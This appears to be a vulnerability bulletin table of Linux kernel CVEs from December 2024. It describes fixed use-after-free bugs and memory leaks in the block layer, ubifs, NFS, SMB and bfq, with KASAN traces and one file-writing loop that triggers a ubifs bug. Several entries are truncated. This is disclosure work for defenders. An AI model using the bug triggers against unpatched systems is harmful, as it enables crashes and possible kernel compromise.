CVE-2024-53169 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: block: fix uaf for flush rq while iterating tags blk_mq_clear_flush_rq_mapping() is not called during scsi probe, by checking blk_queue_init_done(). However, QUEUE_FLAG_INIT_DONE is cleared in del_gendisk by commit aec89dc5d421 ("block: keep q_usage_counter in atomic mode after del_gendisk"), hence for disk like scsi, following blk_mq_destroy_queue() will not clear flush rq from tags->rqs[] as well, cause following uaf that is found by our syzkaller for v6.6: ================================================================== BUG: KASAN: slab-use-after-free in blk_mq_find_and_get_req+0x16e/0x1a0 block/blk-mq-tag.c:261 Read of size 4 at addr ffff88811c969c20 by task kworker/1:2H/224909 CPU: 1 PID: 224909 Comm: kworker/1:2H Not tainted 6.6.0-ga836a5060850 #32 Workqueue: kblockd blk_mq_timeout_work Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x91/0xf0 lib/dump_stack.c:106 print_address_description.constprop.0+0x66/0x300 mm/kasan/report.c:364 print_report+0x3e/0x70 mm/kasan/report.c:475 kasan_report+0xb8/0xf0 mm/kasan/report.c:588 blk_mq_find_and_get_req+0x16e/0x1a0 block/blk-mq-tag.c:261 bt_iter block/blk-mq-tag.c:288 [inline] __sbitmap_for_each_set include/linux/sbitmap.h:295 [inline] sbitmap_for_each_set include/linux/sbitmap.h:316 [inline] bt_for_each+0x455/0x790 block/blk-mq-tag.c:325 blk_mq_queue_tag_busy_iter+0x320/0x740 block/blk-mq-tag.c:534 blk_mq_timeout_work+0x1a3/0x7b0 block/blk-mq.c:1673 process_one_work+0x7c4/0x1450 kernel/workqueue.c:2631 process_scheduled_works kernel/workqueue.c:2704 [inline] worker_thread+0x804/0xe40 kernel/workqueue.c:2785 kthread+0x346/0x450 kernel/kthread.c:388 ret_from_fork+0x4d/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1b/0x30 arch/x86/entry/entry_64.S:293 Allocated by task 942: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 ____kasan_kmalloc mm/kasan/common.c:374 [inline] __kasan_kmalloc mm/kasan/common.c:383 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:380 kasan_kmalloc include/linux/kasan.h:198 [inline] __do_kmalloc_node mm/slab_common.c:1007 [inline] __kmalloc_node+0x69/0x170 mm/slab_common.c:1014 kmalloc_node include/linux/slab.h:620 [inline] kzalloc_node include/linux/slab.h:732 [inline] blk_alloc_flush_queue+0x144/0x2f0 block/blk-flush.c:499 blk_mq_alloc_hctx+0x601/0x940 block/blk-mq.c:3788 blk_mq_alloc_and_init_hctx+0x27f/0x330 block/blk-mq.c:4261 blk_mq_realloc_hw_ctxs+0x488/0x5e0 block/blk-mq.c:4294 blk_mq_init_allocated_queue+0x188/0x860 block/blk-mq.c:4350 blk_mq_init_queue_data block/blk-mq.c:4166 [inline] blk_mq_init_queue+0x8d/0x100 block/blk-mq.c:4176 scsi_alloc_sdev+0x843/0xd50 drivers/scsi/scsi_scan.c:335 scsi_probe_and_add_lun+0x77c/0xde0 drivers/scsi/scsi_scan.c:1189 __scsi_scan_target+0x1fc/0x5a0 drivers/scsi/scsi_scan.c:1727 scsi_scan_channel drivers/scsi/scsi_scan.c:1815 [inline] scsi_scan_channel+0x14b/0x1e0 drivers/scsi/scsi_scan.c:1791 scsi_scan_host_selected+0x2fe/0x400 drivers/scsi/scsi_scan.c:1844 scsi_scan+0x3a0/0x3f0 drivers/scsi/scsi_sysfs.c:151 store_scan+0x2a/0x60 drivers/scsi/scsi_sysfs.c:191 dev_attr_store+0x5c/0x90 drivers/base/core.c:2388 sysfs_kf_write+0x11c/0x170 fs/sysfs/file.c:136 kernfs_fop_write_iter+0x3fc/0x610 fs/kernfs/file.c:338 call_write_iter include/linux/fs.h:2083 [inline] new_sync_write+0x1b4/0x2d0 fs/read_write.c:493 vfs_write+0x76c/0xb00 fs/read_write.c:586 ksys_write+0x127/0x250 fs/read_write.c:639 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x70/0x120 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x78/0xe2 Freed by task 244687: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 kasan_save_free_info+0x2b/0x50 mm/kasan/generic.c:522 ____kasan_slab_free mm/kasan/common.c:236 [inline] __kasan_slab_free+0x12a/0x1b0 mm/kasan/common.c:244 kasan_slab_free include/linux/kasan.h:164 [in ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-53170 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ubifs: authentication: Fix use-after-free in ubifs_tnc_end_commit After an insertion in TNC, the tree might split and cause a node to change its `znode->parent`. A further deletion of other nodes in the tree (which also could free the nodes), the aforementioned node's `znode->cparent` could still point to a freed node. This `znode->cparent` may not be updated when getting nodes to commit in `ubifs_tnc_start_commit()`. This could then trigger a use-after-free when accessing the `znode->cparent` in `write_index()` in `ubifs_tnc_end_commit()`. This can be triggered by running rm -f /etc/test-file.bin dd if=/dev/urandom of=/etc/test-file.bin bs=1M count=60 conv=fsync in a loop, and with `CONFIG_UBIFS_FS_AUTHENTICATION`. KASAN then reports: BUG: KASAN: use-after-free in ubifs_tnc_end_commit+0xa5c/0x1950 Write of size 32 at addr ffffff800a3af86c by task ubifs_bgt0_20/153 Call trace: dump_backtrace+0x0/0x340 show_stack+0x18/0x24 dump_stack_lvl+0x9c/0xbc print_address_description.constprop.0+0x74/0x2b0 kasan_report+0x1d8/0x1f0 kasan_check_range+0xf8/0x1a0 memcpy+0x84/0xf4 ubifs_tnc_end_commit+0xa5c/0x1950 do_commit+0x4e0/0x1340 ubifs_bg_thread+0x234/0x2e0 kthread+0x36c/0x410 ret_from_fork+0x10/0x20 Allocated by task 401: kasan_save_stack+0x38/0x70 __kasan_kmalloc+0x8c/0xd0 __kmalloc+0x34c/0x5bc tnc_insert+0x140/0x16a4 ubifs_tnc_add+0x370/0x52c ubifs_jnl_write_data+0x5d8/0x870 do_writepage+0x36c/0x510 ubifs_writepage+0x190/0x4dc __writepage+0x58/0x154 write_cache_pages+0x394/0x830 do_writepages+0x1f0/0x5b0 filemap_fdatawrite_wbc+0x170/0x25c file_write_and_wait_range+0x140/0x190 ubifs_fsync+0xe8/0x290 vfs_fsync_range+0xc0/0x1e4 do_fsync+0x40/0x90 __arm64_sys_fsync+0x34/0x50 invoke_syscall.constprop.0+0xa8/0x260 do_el0_svc+0xc8/0x1f0 el0_svc+0x34/0x70 el0t_64_sync_handler+0x108/0x114 el0t_64_sync+0x1a4/0x1a8 Freed by task 403: kasan_save_stack+0x38/0x70 kasan_set_track+0x28/0x40 kasan_set_free_info+0x28/0x4c __kasan_slab_free+0xd4/0x13c kfree+0xc4/0x3a0 tnc_delete+0x3f4/0xe40 ubifs_tnc_remove_range+0x368/0x73c ubifs_tnc_remove_ino+0x29c/0x2e0 ubifs_jnl_delete_inode+0x150/0x260 ubifs_evict_inode+0x1d4/0x2e4 evict+0x1c8/0x450 iput+0x2a0/0x3c4 do_unlinkat+0x2cc/0x490 __arm64_sys_unlinkat+0x90/0x100 invoke_syscall.constprop.0+0xa8/0x260 do_el0_svc+0xc8/0x1f0 el0_svc+0x34/0x70 el0t_64_sync_handler+0x108/0x114 el0t_64_sync+0x1a4/0x1a8 The offending `memcpy()` in `ubifs_copy_hash()` has a use-after-free when a node becomes root in TNC but still has a `cparent` to an already freed node. More specifically, consider the following TNC: zroot / / zp1 / / zn Inserting a new node `zn_new` with a key smaller then `zn` will trigger a split in `tnc_insert()` if `zp1` is full: zroot / \ / \ zp1 zp2 / \ / \ zn_new zn `zn->parent` has now been moved to `zp2`, *but* `zn->cparent` still points to `zp1`. Now, consider a removal of all the nodes _except_ `zn`. Just when `tnc_delete()` is about to delete `zroot` and `zp2`: zroot \ \ zp2 \ \ zn `zroot` and `zp2` get freed and the tree collapses: zn `zn` now becomes the new `zroot`. `get_znodes_to_commit()` will now only find `zn`, the new `zroot`, and `write_index()` will check its `znode->cparent` that wrongly points to the already freed `zp1`. `ubifs_copy_hash()` thus gets wrongly called with `znode->cparent->zbranch[znode->iip].hash` that triggers the use-after-free! Fix this by explicitly setting `znode->cparent` to `NULL` in `get_znodes_to_commit()` for the root node. The search for the dirty nodes ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-53171 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ubi: fastmap: Fix duplicate slab cache names while attaching Since commit 4c39529663b9 ("slab: Warn on duplicate cache names when DEBUG_VM=y"), the duplicate slab cache names can be detected and a kernel WARNING is thrown out. In UBI fast attaching process, alloc_ai() could be invoked twice with the same slab cache name 'ubi_aeb_slab_cache', which will trigger following warning messages: kmem_cache of name 'ubi_aeb_slab_cache' already exists WARNING: CPU: 0 PID: 7519 at mm/slab_common.c:107 __kmem_cache_create_args+0x100/0x5f0 Modules linked in: ubi(+) nandsim [last unloaded: nandsim] CPU: 0 UID: 0 PID: 7519 Comm: modprobe Tainted: G 6.12.0-rc2 RIP: 0010:__kmem_cache_create_args+0x100/0x5f0 Call Trace: __kmem_cache_create_args+0x100/0x5f0 alloc_ai+0x295/0x3f0 [ubi] ubi_attach+0x3c3/0xcc0 [ubi] ubi_attach_mtd_dev+0x17cf/0x3fa0 [ubi] ubi_init+0x3fb/0x800 [ubi] do_init_module+0x265/0x7d0 __x64_sys_finit_module+0x7a/0xc0 The problem could be easily reproduced by loading UBI device by fastmap with CONFIG_DEBUG_VM=y. Fix it by using different slab names for alloc_ai() callers. | 2024-12-27 | not yet calculated | CVE-2024-53172 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: NFSv4.0: Fix a use-after-free problem in the asynchronous open() Yang Erkun reports that when two threads are opening files at the same time, and are forced to abort before a reply is seen, then the call to nfs_release_seqid() in nfs4_opendata_free() can result in a use-after-free of the pointer to the defunct rpc task of the other thread. The fix is to ensure that if the RPC call is aborted before the call to nfs_wait_on_sequence() is complete, then we must call nfs_release_seqid() in nfs4_open_release() before the rpc_task is freed. | 2024-12-27 | not yet calculated | CVE-2024-53173 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: SUNRPC: make sure cache entry active before cache_show The function `c_show` was called with protection from RCU. This only ensures that `cp` will not be freed. Therefore, the reference count for `cp` can drop to zero, which will trigger a refcount use-after-free warning when `cache_get` is called. To resolve this issue, use `cache_get_rcu` to ensure that `cp` remains active. ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 7 PID: 822 at lib/refcount.c:25 refcount_warn_saturate+0xb1/0x120 CPU: 7 UID: 0 PID: 822 Comm: cat Not tainted 6.12.0-rc3+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 RIP: 0010:refcount_warn_saturate+0xb1/0x120 Call Trace: <TASK> c_show+0x2fc/0x380 [sunrpc] seq_read_iter+0x589/0x770 seq_read+0x1e5/0x270 proc_reg_read+0xe1/0x140 vfs_read+0x125/0x530 ksys_read+0xc1/0x160 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2024-12-27 | not yet calculated | CVE-2024-53174 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ipc: fix memleak if msg_init_ns failed in create_ipc_ns Percpu memory allocation may failed during create_ipc_ns however this fail is not handled properly since ipc sysctls and mq sysctls is not released properly. Fix this by release these two resource when failure. Here is the kmemleak stack when percpu failed: unreferenced object 0xffff88819de2a600 (size 512): comm "shmem_2nstest", pid 120711, jiffies 4300542254 hex dump (first 32 bytes): 60 aa 9d 84 ff ff ff ff fc 18 48 b2 84 88 ff ff `.........H..... 04 00 00 00 a4 01 00 00 20 e4 56 81 ff ff ff ff ........ .V..... backtrace (crc be7cba35): [<ffffffff81b43f83>] __kmalloc_node_track_caller_noprof+0x333/0x420 [<ffffffff81a52e56>] kmemdup_noprof+0x26/0x50 [<ffffffff821b2f37>] setup_mq_sysctls+0x57/0x1d0 [<ffffffff821b29cc>] copy_ipcs+0x29c/0x3b0 [<ffffffff815d6a10>] create_new_namespaces+0x1d0/0x920 [<ffffffff815d7449>] copy_namespaces+0x2e9/0x3e0 [<ffffffff815458f3>] copy_process+0x29f3/0x7ff0 [<ffffffff8154b080>] kernel_clone+0xc0/0x650 [<ffffffff8154b6b1>] __do_sys_clone+0xa1/0xe0 [<ffffffff843df8ff>] do_syscall_64+0xbf/0x1c0 [<ffffffff846000b0>] entry_SYSCALL_64_after_hwframe+0x4b/0x53 | 2024-12-27 | not yet calculated | CVE-2024-53175 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: During unmount, ensure all cached dir instances drop their dentry The unmount process (cifs_kill_sb() calling close_all_cached_dirs()) can race with various cached directory operations, which ultimately results in dentries not being dropped and these kernel BUGs: BUG: Dentry ffff88814f37e358{i=1000000000080,n=/} still in use (2) [unmount of cifs cifs] VFS: Busy inodes after unmount of cifs (cifs) ------------[ cut here ]------------ kernel BUG at fs/super.c:661! This happens when a cfid is in the process of being cleaned up when, and has been removed from the cfids->entries list, including: - Receiving a lease break from the server - Server reconnection triggers invalidate_all_cached_dirs(), which removes all the cfids from the list - The laundromat thread decides to expire an old cfid. To solve these problems, dropping the dentry is done in queued work done in a newly-added cfid_put_wq workqueue, and close_all_cached_dirs() flushes that workqueue after it drops all the dentries of which it's aware. This is a global workqueue (rather than scoped to a mount), but the queued work is minimal. The final cleanup work for cleaning up a cfid is performed via work queued in the serverclose_wq workqueue; this is done separate from dropping the dentries so that close_all_cached_dirs() doesn't block on any server operations. Both of these queued works expect to invoked with a cfid reference and a tcon reference to avoid those objects from being freed while the work is ongoing. While we're here, add proper locking to close_all_cached_dirs(), and locking around the freeing of cfid->dentry. | 2024-12-27 | not yet calculated | CVE-2024-53176 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: prevent use-after-free due to open_cached_dir error paths If open_cached_dir() encounters an error parsing the lease from the server, the error handling may race with receiving a lease break, resulting in open_cached_dir() freeing the cfid while the queued work is pending. Update open_cached_dir() to drop refs rather than directly freeing the cfid. Have cached_dir_lease_break(), cfids_laundromat_worker(), and invalidate_all_cached_dirs() clear has_lease immediately while still holding cfids->cfid_list_lock, and then use this to also simplify the reference counting in cfids_laundromat_worker() and invalidate_all_cached_dirs(). Fixes this KASAN splat (which manually injects an error and lease break in open_cached_dir()): ================================================================== BUG: KASAN: slab-use-after-free in smb2_cached_lease_break+0x27/0xb0 Read of size 8 at addr ffff88811cc24c10 by task kworker/3:1/65 CPU: 3 UID: 0 PID: 65 Comm: kworker/3:1 Not tainted 6.12.0-rc6-g255cf264e6e5-dirty #87 Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 Workqueue: cifsiod smb2_cached_lease_break Call Trace: <TASK> dump_stack_lvl+0x77/0xb0 print_report+0xce/0x660 kasan_report+0xd3/0x110 smb2_cached_lease_break+0x27/0xb0 process_one_work+0x50a/0xc50 worker_thread+0x2ba/0x530 kthread+0x17c/0x1c0 ret_from_fork+0x34/0x60 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 2464: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 __kasan_kmalloc+0xaa/0xb0 open_cached_dir+0xa7d/0x1fb0 smb2_query_path_info+0x43c/0x6e0 cifs_get_fattr+0x346/0xf10 cifs_get_inode_info+0x157/0x210 cifs_revalidate_dentry_attr+0x2d1/0x460 cifs_getattr+0x173/0x470 vfs_statx_path+0x10f/0x160 vfs_statx+0xe9/0x150 vfs_fstatat+0x5e/0xc0 __do_sys_newfstatat+0x91/0xf0 do_syscall_64+0x95/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 2464: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x51/0x70 kfree+0x174/0x520 open_cached_dir+0x97f/0x1fb0 smb2_query_path_info+0x43c/0x6e0 cifs_get_fattr+0x346/0xf10 cifs_get_inode_info+0x157/0x210 cifs_revalidate_dentry_attr+0x2d1/0x460 cifs_getattr+0x173/0x470 vfs_statx_path+0x10f/0x160 vfs_statx+0xe9/0x150 vfs_fstatat+0x5e/0xc0 __do_sys_newfstatat+0x91/0xf0 do_syscall_64+0x95/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e Last potentially related work creation: kasan_save_stack+0x33/0x60 __kasan_record_aux_stack+0xad/0xc0 insert_work+0x32/0x100 __queue_work+0x5c9/0x870 queue_work_on+0x82/0x90 open_cached_dir+0x1369/0x1fb0 smb2_query_path_info+0x43c/0x6e0 cifs_get_fattr+0x346/0xf10 cifs_get_inode_info+0x157/0x210 cifs_revalidate_dentry_attr+0x2d1/0x460 cifs_getattr+0x173/0x470 vfs_statx_path+0x10f/0x160 vfs_statx+0xe9/0x150 vfs_fstatat+0x5e/0xc0 __do_sys_newfstatat+0x91/0xf0 do_syscall_64+0x95/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The buggy address belongs to the object at ffff88811cc24c00 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 16 bytes inside of freed 1024-byte region [ffff88811cc24c00, ffff88811cc25000) | 2024-12-27 | not yet calculated | CVE-2024-53177 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: Don't leak cfid when reconnect races with open_cached_dir open_cached_dir() may either race with the tcon reconnection even before compound_send_recv() or directly trigger a reconnection via SMB2_open_init() or SMB_query_info_init(). The reconnection process invokes invalidate_all_cached_dirs() via cifs_mark_open_files_invalid(), which removes all cfids from the cfids->entries list but doesn't drop a ref if has_lease isn't true. This results in the currently-being-constructed cfid not being on the list, but still having a refcount of 2. It leaks if returned from open_cached_dir(). Fix this by setting cfid->has_lease when the ref is actually taken; the cfid will not be used by other threads until it has a valid time. Addresses these kmemleaks: unreferenced object 0xffff8881090c4000 (size 1024): comm "bash", pid 1860, jiffies 4295126592 hex dump (first 32 bytes): 00 01 00 00 00 00 ad de 22 01 00 00 00 00 ad de ........"....... 00 ca 45 22 81 88 ff ff f8 dc 4f 04 81 88 ff ff ..E"......O..... backtrace (crc 6f58c20f): [<ffffffff8b895a1e>] __kmalloc_cache_noprof+0x2be/0x350 [<ffffffff8bda06e3>] open_cached_dir+0x993/0x1fb0 [<ffffffff8bdaa750>] cifs_readdir+0x15a0/0x1d50 [<ffffffff8b9a853f>] iterate_dir+0x28f/0x4b0 [<ffffffff8b9a9aed>] __x64_sys_getdents64+0xfd/0x200 [<ffffffff8cf6da05>] do_syscall_64+0x95/0x1a0 [<ffffffff8d00012f>] entry_SYSCALL_64_after_hwframe+0x76/0x7e unreferenced object 0xffff8881044fdcf8 (size 8): comm "bash", pid 1860, jiffies 4295126592 hex dump (first 8 bytes): 00 cc cc cc cc cc cc cc ........ backtrace (crc 10c106a9): [<ffffffff8b89a3d3>] __kmalloc_node_track_caller_noprof+0x363/0x480 [<ffffffff8b7d7256>] kstrdup+0x36/0x60 [<ffffffff8bda0700>] open_cached_dir+0x9b0/0x1fb0 [<ffffffff8bdaa750>] cifs_readdir+0x15a0/0x1d50 [<ffffffff8b9a853f>] iterate_dir+0x28f/0x4b0 [<ffffffff8b9a9aed>] __x64_sys_getdents64+0xfd/0x200 [<ffffffff8cf6da05>] do_syscall_64+0x95/0x1a0 [<ffffffff8d00012f>] entry_SYSCALL_64_after_hwframe+0x76/0x7e And addresses these BUG splats when unmounting the SMB filesystem: BUG: Dentry ffff888140590ba0{i=1000000000080,n=/} still in use (2) [unmount of cifs cifs] WARNING: CPU: 3 PID: 3433 at fs/dcache.c:1536 umount_check+0xd0/0x100 Modules linked in: CPU: 3 UID: 0 PID: 3433 Comm: bash Not tainted 6.12.0-rc4-g850925a8133c-dirty #49 Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 RIP: 0010:umount_check+0xd0/0x100 Code: 8d 7c 24 40 e8 31 5a f4 ff 49 8b 54 24 40 41 56 49 89 e9 45 89 e8 48 89 d9 41 57 48 89 de 48 c7 c7 80 e7 db ac e8 f0 72 9a ff <0f> 0b 58 31 c0 5a 5b 5d 41 5c 41 5d 41 5e 41 5f e9 2b e5 5d 01 41 RSP: 0018:ffff88811cc27978 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888140590ba0 RCX: ffffffffaaf20bae RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff8881f6fb6f40 RBP: ffff8881462ec000 R08: 0000000000000001 R09: ffffed1023984ee3 R10: ffff88811cc2771f R11: 00000000016cfcc0 R12: ffff888134383e08 R13: 0000000000000002 R14: ffff8881462ec668 R15: ffffffffaceab4c0 FS: 00007f23bfa98740(0000) GS:ffff8881f6f80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000556de4a6f808 CR3: 0000000123c80000 CR4: 0000000000350ef0 Call Trace: <TASK> d_walk+0x6a/0x530 shrink_dcache_for_umount+0x6a/0x200 generic_shutdown_super+0x52/0x2a0 kill_anon_super+0x22/0x40 cifs_kill_sb+0x159/0x1e0 deactivate_locked_super+0x66/0xe0 cleanup_mnt+0x140/0x210 task_work_run+0xfb/0x170 syscall_exit_to_user_mode+0x29f/0x2b0 do_syscall_64+0xa1/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f23bfb93ae7 Code: ff ff ff ff c3 66 0f 1f 44 00 00 48 8b 0d 11 93 0d 00 f7 d8 64 89 01 b8 ff ff ff ff eb bf 0f 1f 44 00 00 b8 50 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e9 92 0d 00 f7 d8 64 89 ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-53178 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: client: fix use-after-free of signing key Customers have reported use-after-free in @ses->auth_key.response with SMB2.1 + sign mounts which occurs due to following race: task A task B cifs_mount() dfs_mount_share() get_session() cifs_mount_get_session() cifs_send_recv() cifs_get_smb_ses() compound_send_recv() cifs_setup_session() smb2_setup_request() kfree_sensitive() smb2_calc_signature() crypto_shash_setkey() *UAF* Fix this by ensuring that we have a valid @ses->auth_key.response by checking whether @ses->ses_status is SES_GOOD or SES_EXITING with @ses->ses_lock held. After commit 24a9799aa8ef ("smb: client: fix UAF in smb2_reconnect_server()"), we made sure to call ->logoff() only when @ses was known to be good (e.g. valid ->auth_key.response), so it's safe to access signing key when @ses->ses_status == SES_EXITING. | 2024-12-27 | not yet calculated | CVE-2024-53179 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: Add sanity NULL check for the default mmap fault handler A driver might allow the mmap access before initializing its runtime->dma_area properly. Add a proper NULL check before passing to virt_to_page() for avoiding a panic. | 2024-12-27 | not yet calculated | CVE-2024-53180 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: um: vector: Do not use drvdata in release The drvdata is not available in release. Let's just use container_of() to get the vector_device instance. Otherwise, removing a vector device will result in a crash: RIP: 0033:vector_device_release+0xf/0x50 RSP: 00000000e187bc40 EFLAGS: 00010202 RAX: 0000000060028f61 RBX: 00000000600f1baf RCX: 00000000620074e0 RDX: 000000006220b9c0 RSI: 0000000060551c80 RDI: 0000000000000000 RBP: 00000000e187bc50 R08: 00000000603ad594 R09: 00000000e187bb70 R10: 000000000000135a R11: 00000000603ad422 R12: 00000000623ae028 R13: 000000006287a200 R14: 0000000062006d30 R15: 00000000623700b6 Kernel panic - not syncing: Segfault with no mm CPU: 0 UID: 0 PID: 16 Comm: kworker/0:1 Not tainted 6.12.0-rc6-g59b723cd2adb #1 Workqueue: events mc_work_proc Stack: 60028f61 623ae028 e187bc80 60276fcd 6220b9c0 603f5820 623ae028 00000000 e187bcb0 603a2bcd 623ae000 62370010 Call Trace: [<60028f61>] ? vector_device_release+0x0/0x50 [<60276fcd>] device_release+0x70/0xba [<603a2bcd>] kobject_put+0xba/0xe7 [<60277265>] put_device+0x19/0x1c [<60281266>] platform_device_put+0x26/0x29 [<60281e5f>] platform_device_unregister+0x2c/0x2e [<60029422>] vector_remove+0x52/0x58 [<60031316>] ? mconsole_reply+0x0/0x50 [<600310c8>] mconsole_remove+0x160/0x1cc [<603b19f4>] ? strlen+0x0/0x15 [<60066611>] ? __dequeue_entity+0x1a9/0x206 [<600666a7>] ? set_next_entity+0x39/0x63 [<6006666e>] ? set_next_entity+0x0/0x63 [<60038fa6>] ? um_set_signals+0x0/0x43 [<6003070c>] mc_work_proc+0x77/0x91 [<60057664>] process_scheduled_works+0x1b3/0x2dd [<60055f32>] ? assign_work+0x0/0x58 [<60057f0a>] worker_thread+0x1e9/0x293 [<6005406f>] ? set_pf_worker+0x0/0x64 [<6005d65d>] ? arch_local_irq_save+0x0/0x2d [<6005d748>] ? kthread_exit+0x0/0x3a [<60057d21>] ? worker_thread+0x0/0x293 [<6005dbf1>] kthread+0x126/0x12b [<600219c5>] new_thread_handler+0x85/0xb6 | 2024-12-27 | not yet calculated | CVE-2024-53181 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Revert "block, bfq: merge bfq_release_process_ref() into bfq_put_cooperator()" This reverts commit bc3b1e9e7c50e1de0f573eea3871db61dd4787de. The bic is associated with sync_bfqq, and bfq_release_process_ref cannot be put into bfq_put_cooperator. kasan report: [ 400.347277] ================================================================== [ 400.347287] BUG: KASAN: slab-use-after-free in bic_set_bfqq+0x200/0x230 [ 400.347420] Read of size 8 at addr ffff88881cab7d60 by task dockerd/5800 [ 400.347430] [ 400.347436] CPU: 24 UID: 0 PID: 5800 Comm: dockerd Kdump: loaded Tainted: G E 6.12.0 #32 [ 400.347450] Tainted: [E]=UNSIGNED_MODULE [ 400.347454] Hardware name: VMware, Inc. VMware20,1/440BX Desktop Reference Platform, BIOS VMW201.00V.20192059.B64.2207280713 07/28/2022 [ 400.347460] Call Trace: [ 400.347464] <TASK> [ 400.347468] dump_stack_lvl+0x5d/0x80 [ 400.347490] print_report+0x174/0x505 [ 400.347521] kasan_report+0xe0/0x160 [ 400.347541] bic_set_bfqq+0x200/0x230 [ 400.347549] bfq_bic_update_cgroup+0x419/0x740 [ 400.347560] bfq_bio_merge+0x133/0x320 [ 400.347584] blk_mq_submit_bio+0x1761/0x1e20 [ 400.347625] __submit_bio+0x28b/0x7b0 [ 400.347664] submit_bio_noacct_nocheck+0x6b2/0xd30 [ 400.347690] iomap_readahead+0x50c/0x680 [ 400.347731] read_pages+0x17f/0x9c0 [ 400.347785] page_cache_ra_unbounded+0x366/0x4a0 [ 400.347795] filemap_fault+0x83d/0x2340 [ 400.347819] __xfs_filemap_fault+0x11a/0x7d0 [xfs] [ 400.349256] __do_fault+0xf1/0x610 [ 400.349270] do_fault+0x977/0x11a0 [ 400.349281] __handle_mm_fault+0x5d1/0x850 [ 400.349314] handle_mm_fault+0x1f8/0x560 [ 400.349324] do_user_addr_fault+0x324/0x970 [ 400.349337] exc_page_fault+0x76/0xf0 [ 400.349350] asm_exc_page_fault+0x26/0x30 [ 400.349360] RIP: 0033:0x55a480d77375 [ 400.349384] Code: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 ae 02 00 00 55 48 89 e5 48 83 ec 58 48 8b 10 <83> 7a 10 00 0f 84 27 02 00 00 44 0f b6 42 28 44 0f b6 4a 29 41 80 [ 400.349392] RSP: 002b:00007f18c37fd8b8 EFLAGS: 00010216 [ 400.349401] RAX: 00007f18c37fd9d0 RBX: 0000000000000000 RCX: 0000000000000000 [ 400.349407] RDX: 000055a484407d38 RSI: 000000c000e8b0c0 RDI: 0000000000000000 [ 400.349412] RBP: 00007f18c37fd910 R08: 000055a484017f60 R09: 000055a484066f80 [ 400.349417] R10: 0000000000194000 R11: 0000000000000005 R12: 0000000000000008 [ 400.349422] R13: 0000000000000000 R14: 000000c000476a80 R15: 0000000000000000 [ 400.349430] </TASK> [ 400.349452] [ 400.349454] Allocated by task 5800: [ 400.349459] kasan_save_stack+0x30/0x50 [ 400.349469] kasan_save_track+0x14/0x30 [ 400.349475] __kasan_slab_alloc+0x89/0x90 [ 400.349482] kmem_cache_alloc_node_noprof+0xdc/0x2a0 [ 400.349492] bfq_get_queue+0x1ef/0x1100 [ 400.349502] __bfq_get_bfqq_handle_split+0x11a/0x510 [ 400.349511] bfq_insert_requests+0xf55/0x9030 [ 400.349519] blk_mq_flush_plug_list+0x446/0x14c0 [ 400.349527] __blk_flush_plug+0x27c/0x4e0 [ 400.349534] blk_finish_plug+0x52/0xa0 [ 400.349540] _xfs_buf_ioapply+0x739/0xc30 [xfs] [ 400.350246] __xfs_buf_submit+0x1b2/0x640 [xfs] [ 400.350967] xfs_buf_read_map+0x306/0xa20 [xfs] [ 400.351672] xfs_trans_read_buf_map+0x285/0x7d0 [xfs] [ 400.352386] xfs_imap_to_bp+0x107/0x270 [xfs] [ 400.353077] xfs_iget+0x70d/0x1eb0 [xfs] [ 400.353786] xfs_lookup+0x2ca/0x3a0 [xfs] [ 400.354506] xfs_vn_lookup+0x14e/0x1a0 [xfs] [ 400.355197] __lookup_slow+0x19c/0x340 [ 400.355204] lookup_one_unlocked+0xfc/0x120 [ 400.355211] ovl_lookup_single+0x1b3/0xcf0 [overlay] [ 400.355255] ovl_lookup_layer+0x316/0x490 [overlay] [ 400.355295] ovl_lookup+0x844/0x1fd0 [overlay] [ 